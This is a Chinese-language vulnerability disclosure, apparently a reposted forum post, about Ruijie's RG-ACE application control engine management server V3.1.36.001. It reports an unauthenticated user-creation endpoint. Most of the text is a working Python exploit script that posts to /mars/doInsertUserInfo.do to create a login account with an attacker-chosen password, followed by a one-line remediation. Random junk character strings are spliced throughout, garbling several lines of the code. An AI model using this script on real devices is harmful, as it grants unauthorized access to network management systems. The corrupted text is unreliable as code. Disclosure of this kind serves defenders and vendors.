锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
6 O8 Z$ i  b9 v6 s
0 S% a, D( F% F7 w) |' t& y
测试的具体版本是
- E! m' k: G  G# I- G9 J' l- L1 `产品名称: 锐捷应用控制引擎
2 T) U- @+ I( R4 s& T' L( q版本号: 3.1.36.001 TC
编译时间: 201104291730
6 ?  A( }( Y! p, \. z# L
! m$ a! k' s" `0 C
漏洞证明：
& D& z+ w- b( _3 s9 a





执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
; n" T- {1 e+ S( g# U$ Aurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
; f  W% D) c& yopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
2 U6 \+ i) J$ ^$ mpost=(("event","userManager.doInsertUserInfo"),
$ h; F1 {8 v+ N4 F) f6 W("useractionname","addButtonValue"),
("useropermanager","userManager"),
5 F9 R' p8 @! f  O("userName","t"), #######账号自己加
0 V5 S4 b, _& _: V2 L: A! O("pwd","aaaaaa"),######密码自己加
' D. ~$ T$ H1 l; i. `2 f! k("trueName","ad"),
* Z3 J0 V( p3 q+ i; S("email",""),
0 i2 M: K3 m* t. R1 g( T! m: b/ @: l1 [("mobilePhone",""),
("officePhone",""),
% J. Q/ h) [( ~8 z0 Z( v) H("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
2 `: k; o. z8 w1 e- @: W% m* g5 aprint "Done"
! ^6 _5 Q2 v5 N
7 n8 n  X3 L1 |8 D登录，连接设备
7 a& Z' Y: E: O- m/ E; p- w$ ^6 }9 g7 x
9 U" E8 w$ {% I" e" I' p$ J+ m
; z4 s% e8 b% ~
' n! f: W8 R8 q& \
3 d% P" o" o7 x- f
默认的管理员admin权限更大点


; O# I: `# I( a/ s. {0 L

: Y/ A, e5 j7 t: P
; x( g5 [! x: l' L修复方案：
加强对接口的权限验证

* E# {; O! d1 S2 w+ ?